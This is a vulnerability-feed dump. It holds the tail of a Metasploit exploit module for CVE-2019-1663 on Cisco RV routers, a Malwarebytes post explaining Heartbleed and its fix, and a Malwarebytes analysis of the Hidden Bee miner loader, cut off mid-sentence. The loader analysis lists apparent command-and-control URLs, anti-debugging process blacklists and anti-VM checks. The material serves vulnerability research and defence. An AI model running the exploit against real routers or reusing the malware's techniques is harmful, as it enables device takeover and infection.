it's the one file that changes the most between versions.\n # Note that it's not a smoking gun given that some branches keep the exact same files in /www\n # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)\n\n fingerprints = {\n \"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706\" => {\n \"version\" => \"Cisco RV110W 1.1.0.9\",\n \"status\" =>Exploit::CheckCode::Vulnerable\n },\n \"8d3b677d870425198f7fae94d6cfe262551aa8bd\" => {\n \"version\" => \"Cisco RV110W 1.2.0.9\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"134ee643ec877641030211193a43cc5e93c96a06\" => {\n \"version\" => \"Cisco RV110W 1.2.0.10\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"e3b2ec9d099a3e3468f8437e5247723643ff830e\" => {\n \"version\" => \"Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)\",\n \"status\" => Exploit::CheckCode::Unknown\n },\n \"6b7b1e8097e8dda26db27a09b8176b9c32b349b3\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.0.21\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"9b1a87b752d11c5ba97dd80d6bae415532615266\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.1.3\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"9b6399842ef69cf94409b65c4c61017c862b9d09\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.2.7\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.3.14, 1.0.3.16\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"8c8e05de96810a02344d96588c09b21c491ede2d\" => {\n \"version\" => \"Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)\",\n \"status\" => Exploit::CheckCode::Unknown\n },\n \"2f29a0dfa78063d643eb17388e27d3f804ff6765\" => {\n \"version\" => \"Cisco RV215W 1.1.0.5\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f\" => {\n \"version\" => \"Cisco RV215W 1.1.0.6\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"7cc8fcce5949a68c31641c38255e7f6ed31ff4db\" => {\n \"version\" => \"Cisco RV215W 1.2.0.14 or 1.2.0.15\",\n \"status\" => Exploit::CheckCode::Vulnerable\n },\n \"050d47ea944eaeadaec08945741e8e380f796741\" => {\n \"version\" => \"Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)\",\n \"status\" => Exploit::CheckCode::Unknown\n }\n }\n\n uri = target_uri.path\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'lang_pack/EN.js')\n })\n if res && res.code == 200\n fingerprint = Digest::SHA1.hexdigest(\"#{res.body.to_s}\")\n if fingerprints.key?(fingerprint)\n print_good(\"Successfully identified device: #{fingerprints[fingerprint][\"version\"]}\")\n return fingerprints[fingerprint][\"status\"]\n else\n print_status(\"Couldn't reliably fingerprint the target.\")\n end\n end\n Exploit::CheckCode::Unknown\n end\n\n def exploit\n print_status('Sending request')\n execute_cmdstager\n end\n\n def execute_command(cmd, opts = {})\n shellcode = prepare_shellcode(cmd.to_s)\n send_request(shellcode)\n end\n\n def on_new_session(session)\n # Given there is no process continuation here, the httpd server will stop\n # functioning properly and we need to take care of proper restart\n # ourselves.\n print_status(\"Reloading httpd service\")\n reload_httpd_service = \"killall httpd && cd /www && httpd && httpd -S\"\n if session.type.to_s.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.sys.process.execute '/bin/sh', \"-c \\\"#{reload_httpd_service}\\\"\"\n else\n session.shell_command(reload_httpd_service)\n end\n ensure\n super\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/cve_2019_1663_cisco_rmi_rce.rb"}], "malwarebytes": [{"lastseen": "2019-09-16T21:30:59", "bulletinFamily": "blog", "description": "The Heartbleed vulnerability was introduced into the OpenSSL crypto library in 2012. It was discovered and fixed in 2014, yet today\u2014five years later\u2014[there are still unpatched systems](<https://www.securityweek.com/heartbleed-still-affects-200000-devices-shodan>). \n\n\nThis article will provide IT teams with the necessary information to decide whether or not to apply the Heartbleed vulnerability fix. However, we caution: The latter could leave your users\u2019 data exposed to future attacks. \n\n### What is the Heartbleed vulnerability?\n\nHeartbleed is a code flaw in the OpenSSL cryptography library. This is what it looks like:\n \n \n memcpy(bp, pl, payload);\n\nIn 2014, a vulnerability was found in [OpenSSL](<https://www.openssl.org/blog/blog/2015/09/28/critical-security-level/>), which is a popular cryptography library. OpenSSL provides developers with tools and resources for the implementation of the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. \n\n\nWebsites, emails, instant messaging (IM) applications, and [virtual private networks (VPNs)](<https://blog.malwarebytes.com/glossary/vpn/>) rely on SSL and TLS protocols for security and privacy of communication over the Internet. Applications with OpenSSL components were exposed to the Heartbleed vulnerability. At the time of discovery, that was 17 percent of all SSL servers. \n\n\nUpon discovery, the vulnerability was given the official vulnerability identifier CVE-2014-0160, but it\u2019s more commonly known by the name Heartbleed. The latter was invented by an engineer from Codenomicon, who was one of the people that discovered the vulnerability. \n\n\nThe name Heartbleed is derived from the source of the vulnerability\u2014a buggy implementation of the RFC 6520 Heartbeat extension, which packed inside it the SSL and TLS protocols for OpenSSL.\n\n### Heartbleed vulnerability behavior\n\nThe Heartbleed vulnerability weakens the security of the most common Internet communication protocols ([SSL and TSL](<https://www.globalsign.com/en/blog/ssl-vs-tls-difference/>)). Websites affected by Heartbleed allow potential attackers to read their memory. That means the encryption keys could be found by savvy cybercriminals. \n\n\nWith the encryption keys exposed, threat actors could gain access to the credentials\u2014such as names and passwords\u2014required to hack into systems. From within the system, depending on the authorization level of the stolen credentials, threat actors can initiate more attacks, eavesdrop on communications, impersonate users, and steal data.\n\n### How Heartbleed works\n\n\n\n[Image source](<https://upload.wikimedia.org/wikipedia/commons/thumb/1/11/Simplified_Heartbleed_explanation.svg/1920px-Simplified_Heartbleed_explanation.svg.png> \"\" ) \n\n\nThe Heartbleed vulnerability damages the security of communication between SSL and TLS servers and clients because it weakens the Heartbeat extension. \n\n\nIdeally, the Heartbeat extension is supposed to secure the SSL and TLS protocols by validating requests made to the server. It allows a computer on one end of the communication to send a Heartbeat Request message. \n\n\nEach message contains a [payload](<https://blog.malwarebytes.com/glossary/payload/>)\u2014a text string that contains the transmitted information\u2014and a number that represents the memory length of the payload\u2014usually as a 16-bit integer. Before providing the requested information, the heartbeat extension is supposed to do a bounds check that validates the input request and returns the exact payload length that was requested. \n\n\nThe flaw in the OpenSSL heartbeat extension created a vulnerability in the validation process. Instead of doing a bounds check, the Heartbeat extension allocated a memory buffer without going through the validation process. Threat actors could send a request and receive up to 64 kilobytes of any of the information available in the memory buffer. \n\n\nMemory buffers are temporary memory storage locations, created for the purpose of storing data in transit. They may contain batches of data types, which represent different stores of information. Essentially, a memory buffer keeps information before it\u2019s sent to its designated location. \n\n\nA memory buffer doesn\u2019t organize data\u2014it stores it in batches. One memory buffer may contain sensitive and financial information, as well as credentials, cookies, website pages and images, digital assets, and any data in transit. When threat actors exploit the Heartbleed vulnerability, they trick the Heartbeat extension into providing them with all of the information available within the memory buffer.\n\n### The Heartbleed fix\n\nBodo Moeller and Adam Langley of Google created the fix for Heartbleed. They wrote a code that told the Heartbeat extension to ignore any Heartbeat Request message that asks for more data than the payload needs. \n\n\nHere\u2019s an example of a [Heartbleed fix](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>):\n \n \n if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0; /* silently discard per RFC 6520 sec. 4 */\n\n### How the Heartbleed vulnerability shaped OpenSSL as we know it\n\nThe [discovery of the Heartbleed vulnerability](<https://resources.whitesourcesoftware.com/blog-whitesource/how-the-heartbleed-vulnerability-shaped-openssl-as-we-know-it>) created worldwide panic. Once the fixes were applied, idle fingers started looking for the causes of the incident. Close scrutiny at OpenSSL revealed that this widely-popular library was maintained solely by two men with a shockingly low budget. \n\n\nThis finding spurred two positive initiatives that changed the landscape of open-source:\n\n * Organizations realized the importance of supporting open-source projects. There\u2019s only so much two people can do with their personal savings. Organizations, on the other hand, can provide the resources needed to maintain the security of open-source projects.\n * To help finance important open-source projects, Linux started the Core Infrastructure Initiative (CII). The CII chooses the most critical open-source projects, which are deemed essential for the vitality of the Internet and other information systems. The CII receives donations from large organizations and offers them to OSS initiatives in the form of programs and grants.\n\nAs with any change-leading crisis, the Heartbleed vulnerability also carried a negative side-effect: the rise of vulnerability brands. The Heartbleed vulnerability was discovered at the same time by two entities\u2014Google and Codenomicon. \n\n\nGoogle chose to disclose the vulnerability privately, sharing the information only with OpenSSL contributors. Codenomicon, on the other hand, chose to spread the news to the public. They named the vulnerability, created a logo and a website, and approached the announcement like a well-funded marketing event. \n\n\nIn the following years, many of the disclosed vulnerabilities were given an almost celebrity-like treatment, with PR agencies building them up into brands, and marketing agencies deploying branded names, logos, and websites. While this can certainly help warn the public against [zero-day ](<https://blog.malwarebytes.com/glossary/zero-day/>)vulnerabilities, it can also create massive confusion. \n\n\nNowadays, security experts and software developers are dealing with vulnerabilities in the thousands. To properly protect their systems, they need to prioritize vulnerabilities. That means deciding which vulnerability requires patching now, and which could be postponed. Sometimes, branded vulnerabilities are marketed as critical when they aren\u2019t. \n\n\nWhen that happens, not all affected parties have the time, skills, and resources to determine the true importance of the vulnerability. Instead of turning vulnerabilities into a buzz word, professionals could better serve the public by creating fixes.\n\n### Heartbleed today\n\nToday, five years after the disclosure of the Heartbleed vulnerability, it still exists in many servers and systems. Current versions of OpenSSL, of course, were fixed. However, systems that didn\u2019t (or couldn't) upgrade to the patched version of OpenSSL are still affected by the vulnerability and open to attack. \n\n\nFor threat actors, finding the Heartbleed vulnerability is a prize; one more easily accessed by automating the work of retrieving it. Once the threat actor finds a vulnerable system, it\u2019s relatively simple to exploit the vulnerability. When that happens, the threat actor gains access to information and/or credentials that could be used to launch other attacks. \n\n### To patch or not to patch\n\nThe Heartbleed vulnerability is a security bug that was introduced into OpenSSL due to human error. Due to the popularity of OpenSSL, many applications were impacted, and threat actors were able to obtain a huge amount of data. \n\n\nFollowing the discovery of the vulnerability, Google employees found a solution and provided OpenSSL contributors with the code that fixed the issue. OpenSSL users were then instructed to upgrade to the latest OpenSSL version. \n\n\nToday, however, the Heartbleed vulnerability can still be found in applications, systems, and devices, even though it\u2019s a matter of upgrading the OpenSSL version rather than editing the codebase. If you are concerned that you may be affected, you can [test your system](<https://geekflare.com/how-to-test-heart-bleed-ssl-vulnerabilities-cve-2014-0160/>) for the Heartbleed vulnerability and patch to eliminate the risk or mitigate, if the device is unable to support patching.\n\nAny server or cloud platform should be relatively easy to patch. However, IoT devices may require more advanced mitigation techniques, because they are sometimes unable to be patched. At this point, we recommend speaking with your sysadmin to determine how to mitigate the issue.\n\nThe post [Five years later, Heartbleed vulnerability still unpatched](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-09-12T15:00:00", "published": "2019-09-12T15:00:00", "id": "MALWAREBYTES:AC8C8799BB0970C229AB0C432EECB10A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability/", "type": "malwarebytes", "title": "Five years later, Heartbleed vulnerability still unpatched", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-19T10:37:59", "bulletinFamily": "blog", "description": "About a year ago, [we described the Hidden Bee miner delivered by the Underminer Exploit Kit](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>). \n\nHidden Bee has a complex and multi-layered internal structure that is unusual among cybercrime toolkits, making it an interesting phenomenon on the threat landscape. That's why we're dedicating a series of posts to exploring particular elements and updates made during one year of its evolution. \n\nRecently, we decided to revisit this interesting miner, [describing its loader](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>) that starts the infection from a single malicious executable. This post will present an alternative loader that is deployed when the infection starts from the Underminer Exploit Kit. It is analogous to the loader we described in the following posts from 2018: [[1](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>)] and [[2](<https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/>)]. \n\n### The dropped payloads: an overview\n\nThe first time we spotted Hidden Bee, it started the infection from a flash exploit. It downloaded and injected two elements with WASM extensions that in reality were executable modules in a custom format. We described them in detail [here](<https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/>). \n\nThe files with WASM extensions, observed a year ago\n\nThose elements were the initial loaders, responsible for initiating [the infection chain that at the end installed the miner](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>).\n\nNowadays, those elements have changed. If we take a look at the elements dropped by the same EK today, we will no longer find those WASM extensions. Instead, we encounter various multimedia files: a WAV (alternatively two WAVs), a JPEG, and a PNG. \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/download_png.png> \"\" )The elements downloaded nowadays: WAV, JPG, PNG\n\nThe WAV files are downloaded by iexplore.exe, the browser where the exploit is run. In contrast, the images are downloaded at later stages of infection. For example, the JPG is always downloaded from the dllhost.exe process. The PNG is often downloaded from yet another process.\n\nIn some runs, we observed the PNG to be downloaded instead of the JPG:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/dropped_payloads2.png> \"\" )Alternative: PNG being downloaded after WAV\n\nWe will start our journey of Hidden Bee analysis by looking at these files. Then, we will move to see the code responsible for processing them in order to reveal their hidden purpose.\n\nThe roadmap of the full described package:\n\nDiagram showing the transitions between the elements\n\n#### The downloaded WAV\n\nThe WAV file sounds like grey noise, and we suspect that it is meant to hide some binary belonging to the malware. \n\nAn oscillogram of the WAV file\n\nThe data is unreadable, probably encrypted or obfuscated:\n\n\n\nWe also found a repeating pattern inside, which looks like an encrypted padding. The size of the chunk is 8 bytes.\n\nThe repeating pattern inside the file: 8 bytes long\n\nThis time, using the repeating pattern as an XOR key didn't help in getting a readable result, so probably some more complex block cipher was used.\n\n#### The JPG\n\nBelow is a sample JPG, downloaded from the URL in the format: `/views/[unique_string].jpg`\n\nIn contrast to the WAV content, the JPG always looks like a valid image. (Interestingly, all the JPGs we observed have a consistent theme of manga-styled girls.) However, if we take a closer look at the image, we can see that some data is appended at the end.\n\n\n\nLet's analyze the JPG and try to extract the payload. \n\nFirst, I opened the image in a hexeditor (i.e. HxD). The size of the full image is 156,005 bytes. The last 118,762 bytes belong to the malware. So, we need remove the first 37,243 bytes (156,005-118,762=37,243) in order to get the payload.\n\nThe appended part of the JPG\n\nThe payload does not look like a valid code, so it is probably obfuscated. Let's try the easiest option first and see if there are any candidates for the XOR key. We can see that the payload has padding at the end:\n\n\n\nLet's try to apply the repeating character (in the given example it is 0xE5) as an XOR key. This is the result ([1953032199142ea8c5872107da8f2297](<https://malshare.com/sample.php?action=detail&hash=1953032199142ea8c5872107da8f2297>)):\n\n\n\nRepeating the experiment on various payloads, we can see that the result always start from the keyword `!rcx`. As we know from analyzing [other elements of Hidden Bee](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>), the authors of this malware decided to use various custom formats named after [64-bit Intel registers](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/x64-architecture>). We also encountered packages starting from `!rbx` and `!rsi` at different layers. So, this is the first element in the chain that uses this convention.\n\nWhen we load the `!rcx` module into IDA, we can confirm that it contains valid code. More detailed explanation about the `!rcx` format will be given later on in this article.\n\n#### The PNG\n\nLet's have a look at a sample PNG, download from the \"captcha.png\" (URL format: `/images/captcha.png?mod=attachment&u=[unique_id]`):\n\n\n\nAlthough it is a PNG in a valid format, it looks like noise. It probably represents bytes of some encrypted data. An attempt of converting PNG to raw bytes didn't give any readable results. We need to analyze the code in order to discover what it hides.\n\n### Code analysis: the initial SWF file \n\nThe initial SWF file is embedded on the website and responsible for serving the exploit. If we look inside it, we will not find anything malicious at first. However, among the binary data we can find another suspicious WAV as an audio asset:\n\n\n\nThe beginning of the file:\n\n\n\nThis SWF file also contains a decoder for it:\n\n\n\nThe function \"decode\" takes four parameters. The first of them is the byte array containing the WAV asset: That is the content to be decoded. The second argument is an MD5 (the \"setup\" function is an MD5 implementation) made of concatenation of the AppId and the AppToken: That is probably the encryption key. The third parameter is a salt (probably the initialization vector of the crypto).\n\nThe salt is fetched from the HTML page, where the Flash component is embedded:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/05/salt_passed.png> \"\" )\n\n#### Alternative case: two WAV files\n\nSometimes, rather than embedding the WAV containing the Flash exploit, authors use another model of delivering it. They store the URL to the WAV, and then they retrieve the file.\n\nIn the below example, we can see how this model is applied to Hidden Bee. The salt, along with the WAV URL, are both stored in the Javascript embedded in the HTML:\n\n\n\nThe Flash file first loads it and then decodes as the next step:\n\n\n\nLooking at the traffic capture, we can see that in this case, not one, but _two_ WAV files are downloaded:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/external_audio1.png> \"\" )A case when two WAV files were downloaded (and none embedded in the Flash)\n\nThe algorithms used to encrypt the content of the first WAV may vary and sometimes the algorithm is supplied as one of the parameters. After the content is fetched, the data from the WAV files is decoded using one of the available algorithms:\n\n\n\nWe can see that the expected content is a Flash file that is then loaded:\n\n\n\n#### The \"decode\" function\n\nThe function \"decode\" is imported from the package \"com.google\":\n\n\n\nThe full decompiled code is available [here](<https://gist.github.com/malwarezone/3aea44e1d4c66821f92b1092461fb815>).\n\nWhen we look inside, we see that the code is slightly obfuscated:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/07/google_decode_obf.png> \"\" )\n\nLooking at the decompiled code, we see some interesting constants. For example, -889275714 in hex is 0xCAFEBABE. As we found during [analysis of other Hidden Bee elements](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>), this DWORD was used by the same authors before as a magic number identifying one of the custom formats.\n\n\n\nInternally, there are references to a function from another module: E_ENCRYPT_process_bytes(). Inside this function, we see calls suggesting that the [Rabbit Cipher](<https://en.wikipedia.org/wiki/Rabbit_\\(cipher\\)>) has been used:\n\n\n\nRabbit uses a 128-bit key (the same length as the MD5 hash that was mentioned before) and a 64-bit initialization vector. (In different runs, a different encryption algorithm may be selected.)\n\nAfter the decoding process is complete, the revealed content is loaded:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/07/load_on_complete.png> \"\" )\n\n#### The first WAV: a Flash exploit\n\nThe decoded WAV contains a package with two elements embedded: a Flash file (movies.swf) and the configuration file (config.cfg). The decrypted data starts from the magic DWORD 0xCAFEBABE, which we noticed in the code of the previous SWF.\n\n\n\nThe Flash file (movies.swf) contains an embedded exploit. In the analyzed case, the exploit used is [CVE-2015-5122](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5122>), however, a different exploit may be used on a different machine:\n\n\n\nThe payload (shellcode) is stored in form of an array (binary version available here: [9aec11ff93b9df14f060f78fbb1b47a2](<https://malshare.com/sample.php?action=detail&hash=9aec11ff93b9df14f060f78fbb1b47a2>)):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/payload32.png> \"\" )\n\nThe configuration file (config.cfg) contains the URL to another WAV file. \n\nThe payload is padded with NOP (0x90) bytes, and the parameters, including the configuration, are filled there before the payload runs.\n\nThe fragment of the code feeding the configuration into the payload\n\n#### The shellcode: downloading the second WAV\n\nThe second WAV, in contrast to the first one, is always downloaded and never embedded. It is retrieved by the \"PayloadWin32\" shellcode ([9aec11ff93b9df14f060f78fbb1b47a2](<https://malshare.com/sample.php?action=detail&hash=9aec11ff93b9df14f060f78fbb1b47a2>)), deployed after the successful exploitation.\n\nLooking inside this shellcode, we find the function that is responsible for downloading and decrypting another WAV. The shellcode uses parameters that were filled by the previous layer. This buffer contains the URL that will be queried and the key that will be used for decryption of the payload. It loads functions from wininet.dll using their checksums. After the initialization steps, it queries the supplied URL. The expected result is a buffer with a header typical for WAV files.\n\n\n\nAs we already suspected, the data of the WAV (starting from the offset 0x2C) contains the encrypted content. Indeed, blocks that are 8 bytes long are decrypted in a loop:\n\n\n\nAfter the decryption is complete, the next module will be revealed. It is interesting to take a look at the expected header of the payload to learn which format is used for the output element. This time, the decoded data is supposed to start with the following magic numbers: 0x01, 0x04, \u2026, 0x10.\n\n\n\n#### The second WAV: an executable in proprietary format\n\nOn the illustration below, we can see how the data of the WAV looks after being decrypted ([9b37c9ec19a53007d450b9b9c8febbe2](<https://malshare.com/sample.php?action=detail&hash=9b37c9ec19a53007d450b9b9c8febbe2>)):\n\n\n\nThis is an executable component that is loaded into Internet Explorer. After it decodes the imports, it starts to look much more familiar:\n\n\n\nWe can see that it follows an analogical structure to the one described in last year's article.\n\nThis module is first executed within Internet Explorer. Then, it creates another process (dllhost.exe) in a suspended state:\n\n\n\nIt injects its original copy there ([769a05f0eddd6ef2ebdd13618b244758](<https://malshare.com/sample.php?action=detail&hash=769a05f0eddd6ef2ebdd13618b244758>)):\n\n\n\nThen it redirects execution to its loading function. Below, we can see the Entry Point of the implanted module within dllhost.exe.\n\n\n\nA detailed analysis of the execution flow of this module and its format will be given later in the article.\n\nAt this point, it is important to note that the dllhost.exe is the module that further downloads the aforementioned images.\n\n### The modules with the custom format\n\nThe module with the custom format is analogous to the one [described before](<https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/>). However, we can see that it has significantly evolved. \n\nThere are changes in the header, as well as improvements in the implementation.\n\n#### Changes in the custom format\n\nThe new header is similar to the [previous one](<https://blog.malwarebytes.com/threat-analysis/2018/08/reversing-malware-in-a-custom-format-hidden-bee-elements/#>). The few details that have changed are: the magic number at the beginning (from 0x1000**03**01 to 0x1000**04**01), and the format in which the DLLs are stored (the length of a DLL name has been added). That's why we will refer to this format as \"0x10000401 format.\"\n\nAnother change is that now the names of the DLLs are obfuscated by a simple XOR with 1 byte character. They are deobfuscated just before being loaded.\n\n\n\nSumming up, we can visualize the new format in the following way:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/new_hdr-2.png> \"\" )\n\n#### Obfuscation used\n\nThis time, authors decide to obfuscate all the strings used inside the module. Now all the strings are decoded just before use.\n\nExample: decoding the string before the use\n\nThe decoding algorithm is simple, based on XOR:\n\nThe string-decoding algorithm\n\n### Inside the images downloader\n\nLet's look inside the first module in the 0x10000401 format that we encountered. This module is an initial stage, and its role is to download and unpack the other components. One such component is in a CAB format (that's why we can see the Cabinet.dll among the imported DLLs). \n\nThe role of this module is similar to the first \"WASM\" mentioned in our post a year ago. However, the current version is not only better protected, but also comes with some improvements. This time the downloaded content is hidden in the images. So, analyzing this element can help us to understand how the used stenography works.\n\nFirst, we can see that the URLs are retrieved from their Base64 form:\n\n\n\nThis string decodes to a list containing URLs of the PNG and JPG files that are going to be downloaded. For each sample, this set is unique. None of the URLs can be reused: the server gives a response only once. An example of a URL set:\n \n \n http://38.75.137.9:9088/pubs/wiki.php?id=937a4eadd6f5a94b3738a58dcc79ca13\n http://38.75.137.9:9088/images/captcha.png?mod=attachment&u;=357e27e8af72925144ec1db2421d0cc5<\n http://38.75.137.9:9088/views/q5ul78uv4b4q8bg8d95canrsns.jpg\n \n\nSo, we can confirm that this module is the one responsible for downloading and processing the observed images. Indeed, inside we can find the functions responsible for their decoding.\n\n#### Decoding the JPG\n\nAfter the payload is retrieved, the JPG header is validated.\n\n\n\nThen, the payload is decoded by simply using an XOR with the last byte. The decoded content is expected to start from the !rcx magic ID.\n\n\n\nAfter decoding the content, the hash of the !rcx module is validated with the help of SHA256 hash. The valid hash is stored in the module's header and compared with the calculated hash of the file content.\n\n\n\nIf the validation passed, the shellcode stored in the !rcx module is loaded. More details about the execution flow will be given later.\n\n\n\nThe !rcx package has a simple header:\n\n\n\n#### Decoding the PNG\n\nRetrieving the content from the PNG is more complex.\n\n\"captcha.png\" - the encrypted CAB file\n\nFirst, after downloading, the PNG header is checked:\n\n\n\nThe function decoding the PNG has the following flow:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/decode_and_load_coresdb.png> \"\" )\n\nIt converts the PNG into byte content and decrypts it with the help of [ARIA cipher](<https://en.wikipedia.org/wiki/ARIA_\\(cipher\\)>). The result should be a CAB format. The unpacked CAB is supposed to contain a module \"bin/i386/core.sdb\" that also occurred in our previous encounters with Hidden Bee.\n\nThe authors are careful not to reuse URLs as well as encryption keys. That's why the Aria key is different for every unique payload. It is stored just after the end of the 0x10000401 module :\n\nKey format: WORD key length; BYTE key_bytes[];\n\nDuring the module's loading, the key is rewritten into another memory area, from which it is used to decrypt the downloaded module.\n\n\n\nThe CAB file retrieved from the PNG is available here: [001bdc26b2845dcf839f67a8760c6839](<https://malshare.com/sample.php?action=detail&hash=001bdc26b2845dcf839f67a8760c6839>)\n\n\n\nIt contains core.sdb ([d1a2fdc79c154b120a0e52c46a73478d](<https://malshare.com/sample.php?action=detail&hash=d1a2fdc79c154b120a0e52c46a73478d>)). That is a second module in Hidden Bee's custom format.\n\n\n\n### Inside core.sdb\n\nThis module (retrieved from the PNG) is a second downloader component in the 0x10000401 format. This time, it uses a custom TCP-based protocol, referenced by the authors as SLTP. (This protocol was also used by the analogical component seen one year ago). The embedded links:\n\n`sltp://dns.howtocom.site:1108/minimal.bin?id=998 sltp://bbs.favcom.space:1108/setup.bin?id=999 `\n\n#### Execution flow\n\n 1. Checks for blacklisted processes. If any are detected, exits.\n 2. Removes functions: `DbgBreakPoint`, `DbgUserBreakPoint` by overwriting their beginning with the RET instruction.\n 3. Checks if the malware is already installed. If yes, exits.\n 4. Creates an installation mutex `{71BB7F1C-D700-4487-B9C6-6DD9863DFE91}-ins.`\n 5. If the module was run with the flag==1:\n 1. Connects to the first address: `sltp://dns.howtocom.site:1108/minimal.bin?id=998 `\n 2. Sets an environment variable `INSTALL_SOURCE` to the value given as an argument.\n 3. Runs the downloaded next stage module.\n 6. If the module was run with the flag!=1:\n 1. Performs checks against VM. If detected, exits.\n 2. Connects to the second address: `sltp://bbs.favcom.space:1108/setup.bin?id=999`. This time, appends the victim's fingerprint to the URL. Format: `<URL>&sid=<INSTALL_SID>&sz=<unique machine ID: 16 bytes hex>&os=<Windows version number>&ar=<architecture>`\n 3. Runs the downloaded next stage module.\n\n#### Defensive checks\n\nAt this stage, many anti-analysis checks are deployed. First, there are checks to detect if any of the blacklisted processes are running. The enumeration of the processes is implemented using a low-level function: `NtQuerySystemInformation` with a parameter 5 (`SystemProcessInformation`).\n\n\n\nThe blacklist contains popular debuggers and sniffers:\n\n\"devenv.exe\" , \"wireshark.exe\", \"vmacthlp.exe\", \"procmon.exe\", \"ollydbg.exe\", \"idag.exe\", \"ImmunityDebugger.exe\", \"windbg.exe\" \n\"EHSniffer.exe\", \"iris.exe\", \"procexp.exe\", \"filemon.exe\", \"fiddler.exe\"\n\nThe names of the processes are obfuscated, so they are not visible on the strings list. If any of those processes are detected, the execution of the module terminates.\n\nAnother function deploys a set of anti-VM checks. The anti-VM checks include:\n\n\n\nCPUID with EAX=40000000 ([a check for Hypervisor's Brand](<https://rayanfam.com/topics/defeating-malware-anti-vm-techniques-cpuid-based-instructions/>)):\n\n \n\nThe VMWAre I/O Port (more details [[here](<https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf>)]):\n\n\n\nVPCEXT instruction (more details [[here](<https://shasaurabh.blogspot.com/2017/07/virtual-machine-detection-techniques.html>)])\n\n\n\nChecking [the list of common VM vendors](<https://wiki.osdev.org/CPUID>):\n\n\n\nChecking the BIOS versions typical for virtual environments:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/check_reg_keys.png> \"\" )\n\nDetection of any of the features suggesting a VM results in termination of the component.\n\n#### Downloading new modules\n\nThe next elements of HiddenBee are downloaded over the custom \"STLP\" protocol. \n\n\n\nThe raw TCP socket created to communicate using the SLTP protocol:\n\n\n\nThe communication is encrypted. We can see that the expected output is a shellcode that is loaded and executed:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/08/load_new_module-1.png> \"\" )\n\nThe way in which it is loaded reminds me of the elements we described recently in \"[Hidden Bee: Let's go down the rabbit hole](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>)\". The current module loads a list of functions that will be passed to the next module. It is a minimalistic, custom version of Import Table. It also passes the memory with the downloaded filesystem to be used for further loading of components.\n\n### The !rcx package\n\nThis element retrieves the custom filesystem used by this malware. As we know from previous analysis, Hidden Bee uses its own, custom filesystems that are mounted in the memory of the malware and passed to its components. This filesystem is important for the execution flow because it contains many other components that are supposed to be installed on the attacked system in order to continue the infection.\n\nAs mentioned before, unpacking the JPG gave us an !rcx package. After this package is downloaded, and its SHA256 checksum is validated, it is repackaged. First, at the end of the !rcx 